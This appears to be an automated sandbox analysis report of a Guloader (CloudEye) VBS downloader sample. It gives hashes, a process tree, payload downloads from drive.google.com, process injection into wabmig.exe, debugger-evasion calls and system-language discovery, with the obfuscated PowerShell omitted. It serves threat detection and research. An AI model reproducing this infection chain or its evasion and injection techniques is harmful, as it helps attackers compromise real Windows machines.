Analysis
-
max time kernel
147s
max time network
127s
platform
windows7_x64
resource
win7-20240708-en
resource tags
arch:x64, arch:x86, image:win7-20240708-en, locale:en-us, os:windows7-x64, system
submitted
25/09/2024, 02:25
Static task
static1
Behavioral task
behavioral1
Sample
ba44e394e0d9dc4fe9d15a2297f8ecbc3affb80100003b5c57898269261b311b.vbs
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
ba44e394e0d9dc4fe9d15a2297f8ecbc3affb80100003b5c57898269261b311b.vbs
Resource
win10v2004-20240802-en
General
-
Target
ba44e394e0d9dc4fe9d15a2297f8ecbc3affb80100003b5c57898269261b311b.vbs
-
Size
32KB
-
MD5
e198fb2a66ebacac2d2a06c6d39b578c
-
SHA1
ac1353658fffdfba77beaa6ce1c42254ba02346f
-
SHA256
ba44e394e0d9dc4fe9d15a2297f8ecbc3affb80100003b5c57898269261b311b
-
SHA512
4c28d4eee277d495d2596eeab0841933ac84f5f72b12f64d9281b4023f7e9c32f22d2368bb634252fdcac4f2b79b5cfe32cdbff015f4dc8a2c6f6acdb1317fe5
-
SSDEEP
384:3PA0Xp74bQBupq5CMat1f9wxdaW+e9FfXpcHIBSi8g:/bFsq5CHePaWB9FfXp9Si8g
Malware Config
Signatures
-
Guloader, Cloudeye
A shellcode based downloader first seen in 2020.
-
Blocklisted process makes network request 3 IoCs
flow  pid   Process
3     1952  WScript.exe
7     2236  powershell.exe
9     2236  powershell.exe
-
pid   Process
2236  powershell.exe
2584  powershell.exe
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
flow  ioc
6     drive.google.com
7     drive.google.com
11    drive.google.com
-
Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
pid   Process
2768  wabmig.exe
2768  wabmig.exe
-
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid   Process
2584  powershell.exe
2768  wabmig.exe
-
Suspicious use of SetThreadContext 1 IoCs
description                          pid   Process         procid_target
PID 2584 set thread context of 2768  2584  powershell.exe  38
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
description  ioc                                                          Process
Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  powershell.exe
Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  cmd.exe
Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  wabmig.exe
-
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
pid   Process
2584  powershell.exe
-
Suspicious behavior: EnumeratesProcesses 3 IoCs
pid   Process
2236  powershell.exe
2584  powershell.exe
2584  powershell.exe
-
Suspicious behavior: MapViewOfSection 1 IoCs
pid   Process
2584  powershell.exe
-
Suspicious use of AdjustPrivilegeToken 2 IoCs
description              pid   Process
Token: SeDebugPrivilege  2236  powershell.exe
Token: SeDebugPrivilege  2584  powershell.exe
-
Suspicious use of SetWindowsHookEx 1 IoCs
pid   Process
2768  wabmig.exe
-
Suspicious use of WriteProcessMemory 23 IoCs
description                       pid   Process         procid_target
PID 1952 wrote to memory of 2236  1952  WScript.exe     30
PID 1952 wrote to memory of 2236  1952  WScript.exe     30
PID 1952 wrote to memory of 2236  1952  WScript.exe     30
PID 2236 wrote to memory of 2900  2236  powershell.exe  32
PID 2236 wrote to memory of 2900  2236  powershell.exe  32
PID 2236 wrote to memory of 2900  2236  powershell.exe  32
PID 2236 wrote to memory of 2588  2236  powershell.exe  34
PID 2236 wrote to memory of 2588  2236  powershell.exe  34
PID 2236 wrote to memory of 2588  2236  powershell.exe  34
PID 2588 wrote to memory of 2584  2588  cmd.exe         35
PID 2588 wrote to memory of 2584  2588  cmd.exe         35
PID 2588 wrote to memory of 2584  2588  cmd.exe         35
PID 2588 wrote to memory of 2584  2588  cmd.exe         35
PID 2584 wrote to memory of 2112  2584  powershell.exe  37
PID 2584 wrote to memory of 2112  2584  powershell.exe  37
PID 2584 wrote to memory of 2112  2584  powershell.exe  37
PID 2584 wrote to memory of 2112  2584  powershell.exe  37
PID 2584 wrote to memory of 2768  2584  powershell.exe  38
PID 2584 wrote to memory of 2768  2584  powershell.exe  38
PID 2584 wrote to memory of 2768  2584  powershell.exe  38
PID 2584 wrote to memory of 2768  2584  powershell.exe  38
PID 2584 wrote to memory of 2768  2584  powershell.exe  38
PID 2584 wrote to memory of 2768  2584  powershell.exe  38
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ba44e394e0d9dc4fe9d15a2297f8ecbc3affb80100003b5c57898269261b311b.vbs"
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
PID: 1952
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[obfuscated PowerShell script omitted]"
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID: 2236
    C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Microchip1.Ana && echo t"
    PID: 2900
    C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c ^"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe^" "[obfuscated PowerShell script omitted]"
    - Suspicious use of WriteProcessMemory
    PID: 2588
      C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "[obfuscated PowerShell script omitted]"
      - Command and Scripting Interpreter: PowerShell
      - Suspicious use of NtSetInformationThreadHideFromDebugger
      - Suspicious use of SetThreadContext
      - System Location Discovery: System Language Discovery
      - Suspicious behavior: CmdExeWriteProcessMemorySpam
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious behavior: MapViewOfSection
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
      PID: 2584
        C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Microchip1.Ana && echo t"
        - System Location Discovery: System Language Discovery
        PID: 2112
        C:\Program Files (x86)\windows mail\wabmig.exe
        "C:\Program Files (x86)\windows mail\wabmig.exe"
        - Suspicious use of NtCreateThreadExHideFromDebugger
        - Suspicious use of NtSetInformationThreadHideFromDebugger
        - System Location Discovery: System Language Discovery
        - Suspicious use of SetWindowsHookEx
        PID: 2768
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize
144B
MD5
2629e35680aa33f66231c447fcdfb956
SHA1
66bf2663992b42f976dd81b303f86e2f2e861700
SHA256
09cf72cc7bd1f7dec7f1bf6201a421fd1c88b2a01fd68c1e970580e6207d8965
SHA512
5a73eafa12e7be4356be896b9afb602ee2c1d359d70047d5e39e69e997e89eee0c0b5092703bb7ba5d272e19593b642bb1a964525bc75c41641f95346a54b1a7
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize
342B
MD5
fbc10c384b33f066e4062bede2cdbe99
SHA1
975bcde178dc1d35c5a531a60679a06b988ba511
SHA256
88debac1187aa733b61a7bb77aec5b882f639cccb2c8e09e4d64b30b81b118d4
SHA512
b7f2c4720a7ac56aa81a8592bdacb21d7aa7c4b3323cbd56bdac42fc48d3a504a3d9eaf245551252b8a1841c873f615e76c539197e47a9c0b4c572d7b1945fa8
-
Filesize
70KB
MD5
49aebf8cbd62d92ac215b2923fb1b9f5
SHA1
1723be06719828dda65ad804298d0431f6aff976
SHA256
b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512
bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b
-
Filesize
181KB
MD5
4ea6026cf93ec6338144661bf1202cd1
SHA1
a1dec9044f750ad887935a01430bf49322fbdcb7
SHA256
8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
SHA512
6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b
-
Filesize
470KB
MD5
dc8b20ecb669b12cb2d377e69425b1ae
SHA1
7f95a7e40871adbc900378d69125f01672b99484
SHA256
efb89bbdef46898ebbb533b069a851427aef1b99983e3156e9b88e4a846828b3
SHA512
b9706209f6b21907e9bbc784638877f612674926b12cb2a73bdc0ad50ae93a2dc4e358c5bf524729732afd9798d13aebdcdaa5e424d785819c4cbff9b3ada141
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ZATUT4I9LLC7R4B4PPJB.temp
Filesize
7KB
MD5
c174779a3cd0e99af4ac09a8f0c348ca
SHA1
fe356a28744cc305fa8c3e64289da4ea55f0c1e5
SHA256
ccad0a305e0d4e1994ee2b198bdc0ae6d32e7dd1469c57e359b768b75cdf7275
SHA512
912738b6f6652dea0fd1f1d163e8b92fffd84a48eac790b4e7353f3edf220f0a145b74acdb61f55c418c76e6198e4b950fb5c84d36114d9ad0cf3b3e8b2de496